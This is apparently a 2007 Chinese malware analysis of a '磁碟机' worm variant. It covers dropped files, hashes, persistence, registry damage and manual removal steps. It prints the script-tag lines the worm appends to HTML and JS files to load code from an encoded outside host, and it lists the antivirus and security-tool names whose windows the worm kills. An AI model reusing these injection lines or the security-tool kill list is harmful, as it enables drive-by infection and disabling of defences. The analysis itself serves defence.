“磁碟机”新变种（LSASS.exe,SMSS.exe,netcfg.dll,pagefile.pif）

“磁碟机”新变种

LSASS.exe SMSS.exe netcfg.dll pagefile.pif

轩辕小聪的分析:

磁碟机变种pagefile.pif

File: pagefile.pif
Size: 88576 bytes
Modified: 2007年12月28日, 16:55:16
MD5: 2C6F3E41B1E909E795B5BCE70B3A44CC
SHA1: 3809D504ABC65D891CB0281BD9B599EA265C406C
CRC32: 225B0B61

前面的分析：

http://www.newjian.net/jisuanjibingdu/2007/1217/1974.html

http://www.newjian.net/jisuanjibingdu/2007/1120/1742.html

http://www.newjian.net/jisuanjibingdu/2007/0730/305.html

1.病毒运行后，生成如下文件
C:\WINDOWS\system32\Com\LSASS.EXE
C:\WINDOWS\system32\Com\netcfg.000
C:\WINDOWS\system32\Com\netcfg.dll
C:\WINDOWS\system32\Com\SMSS.EXE
C:\WINDOWS\system32\894729.log
C:\WINDOWS\system32\dnsq.dll
C:\WINDOWS\system32\ntfsus.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\~.exe
或者在C:\Documents and Settings\用户名\「开始」菜单\程序\启动下面

netcfg.dll负责注入IE并连接网络下载木马
并注册为浏览器加载项
[IfObj Control]
{D9901239-34A2-448D-A000-3705544ECE9D} <C:\WINDOWS\system32\com\netcfg.dll, 506>

dnsq.dll会插入一些进程，并监控C:\WINDOWS\system32\Com\LSASS.EXE，如果该进程被结束，则立即恢复。
而且会监控~.exe，如果该文件被删除，立即重写。

894729.log即pagefile.pif文件
之中还会在C盘生成一个驱动，该驱动应该是用于提升权限所用
各个盘下面生成pagefile.pif和autorun.inf

2.通过查找窗口文字和和获得窗口线程进程ID等函数（GetWindowThreadProcessID）监控指定文字的窗口，之后会发送消息关闭窗口或者通过Terminate process函数结束进程，可能涉及的关键字如下：
avast
firewall
狙剑
bitdefender
escan
ewido
*升级
sreng 介绍
monitor
微点
费尔
antivir
金山
360anti
360safe
avg
dr.web
云
墙
升
瑞
mcagent

最终的结果是很多安全工具和杀毒软件不能使用，包括我们常用的Xdelbox，sreng，Icesword以及Icesword修改版...
该部分具体分析还请各位大大们指点...

3.以独占方式禁止读取各盘下面的根目录下面的pagefile.pif,autorun.inf,C:\boot.ini,C:\Windows\system32\drivers\hosts

C:\boot.ini不能写则Xdelbox等软件被废掉。

4.破坏安全模式
删除如下键
HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer（和安全模式有关？）
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}

5.删除HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run键

6.破坏显示隐藏文件
HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden改为0x00000000

7.感染非系统分区下面部分exe文件和rar,zip压缩包内的exe文件

8.感染非系统分区下面的htm,html等网页文件
在其尾部加入<script src="http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/*"></script>的代码
感染js等脚本文件
在其尾部加入document.write("<ScRiPt src='http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/*'></sCrIpT>");的代码

查杀方法：
下载sreng:http://download.kztechs.com/files/sreng2.zip
Icesword:http://mail.ustc.edu.cn/~jfpan/download/IceSword122cn.zip
经过以上分析发现病毒十分顽固，但貌似强大的病毒背后却有着致命的弱点，它只通过~.exe启动自身，没有其他启动项，所以我们完全可以通过映像劫持处理这个病毒。
1.将下列文字复制到记事本中，并保存为reg文件

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\

CurrentVersion\Image File Execution Options\~.exe]
"Debugger"="清新阳光"

双击导入注册表
重启计算机

2.重启后我们会发现病毒被困死了^_^
现在可以轻松的灭掉它们了

打开Icesword

点击左下角文件 按钮
删除如下文件
C:\WINDOWS\system32\Com\LSASS.EXE
C:\WINDOWS\system32\Com\netcfg.000
C:\WINDOWS\system32\Com\netcfg.dll
C:\WINDOWS\system32\Com\SMSS.EXE
C:\WINDOWS\system32\894729.log
C:\WINDOWS\system32\dnsq.dll
C:\WINDOWS\system32\ntfsus.exe
C:\Documents and Settings\All Users\「开始」菜单\程序\启动\~.exe（一定不要忘记）
或C:\Documents and Settings\用户名\「开始」菜单\程序\启动\~.exe
以及各个分区下面的pagefile.pif和autorun.inf

3.打开sreng
系统修复 － Windows Shell/Ie 全选 - 修复
系统修复 － 高级修复 修复安全模式

系统修复 — 浏览器加载项
删除[IfObj Control]
{D9901239-34A2-448D-A000-3705544ECE9D} <C:\WINDOWS\system32\com\netcfg.dll, 506>

4.使用杀毒软件全盘杀毒，修复受感染的exe文件（如果杀毒软件暂不能认出这个病毒，请暂时不要打开非系统分区下的exe以及压缩包内的exe文件！！！）

5.修复受感染的htm等网页文件

由于抓住了病毒作者的一个疏忽，所以以上查杀方法可能很快就会失效，所以在此征集更好的查杀方法，查找病毒的软肋，并希望大家在使用现在已有的使用比较广泛的工具中(sreng,Icesword,PE,Xdelbox...)研究查杀方案，不要再放出更新的杀毒工具来，那样会很快被病毒杀掉而致以后中毒了真的就"无药可救了"...

www.newjian.com